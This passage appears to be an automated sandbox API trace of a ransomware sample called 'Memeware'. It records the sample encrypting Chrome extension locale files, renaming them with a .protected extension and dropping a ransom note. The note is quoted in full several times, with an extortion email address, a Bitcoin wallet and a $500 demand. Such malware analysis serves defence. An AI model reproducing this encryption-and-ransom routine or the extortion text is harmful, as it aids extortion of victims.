secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.617] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.617] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.617] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.617] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.617] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.617] CloseHandle (hObject=0x164) returned 1 [0079.618] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0079.618] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk") returned 142 [0079.618] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0079.618] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0079.618] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\*") returned 144 [0079.618] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.618] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.618] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.618] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.618] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.618] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.618] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\.") returned 144 [0079.618] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.618] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.618] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.618] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.618] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.618] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.618] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.618] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\..") returned 145 [0079.618] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.618] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.618] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.618] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0079.618] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.618] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.618] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.619] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0079.622] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0079.622] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0079.622] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.622] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x161, lpOverlapped=0x0) returned 1 [0079.623] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.623] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x161, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x161, lpOverlapped=0x0) returned 1 
[0079.623] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.623] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.623] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.624] CloseHandle (hObject=0x168) returned 1 [0079.624] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.protected") returned 166 [0079.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.protected")) returned 1 [0079.624] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.624] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.624] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\RESTORE_FILES.txt") returned 160 [0079.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.625] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.625] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.625] lstrlenA (lpString="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") returned 684 [0079.625] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.626] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.626] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.626] CloseHandle (hObject=0x164) returned 1 [0079.626] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0079.626] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0079.626] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi") returned 142 [0079.626] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0079.626] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0079.626] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\*") returned 144 [0079.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.626] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.626] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.626] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.626] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.626] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.626] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\.") returned 144 [0079.626] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.626] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.626] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.626] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.626] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.626] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.626] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.626] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\..") returned 145 [0079.626] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.626] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.626] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.626] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.627] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.627] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.627] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.627] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.627] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0079.627] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.627] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.627] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.627] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0079.627] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0079.627] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.627] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0079.627] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.627] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x117, lpOverlapped=0x0) returned 1 [0079.628] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.628] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x117, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x117, lpOverlapped=0x0) returned 1 [0079.628] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.628] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.628] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.628] CloseHandle (hObject=0x168) returned 1 [0079.628] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.protected") returned 166 [0079.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.protected")) returned 1 [0079.629] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.629] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.629] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\RESTORE_FILES.txt") returned 160 [0079.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.629] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.629] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.630] lstrlenA (lpString="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") returned 684 [0079.630] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.630] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.630] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.630] CloseHandle (hObject=0x164) returned 1 [0079.630] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0079.630] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0079.630] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: 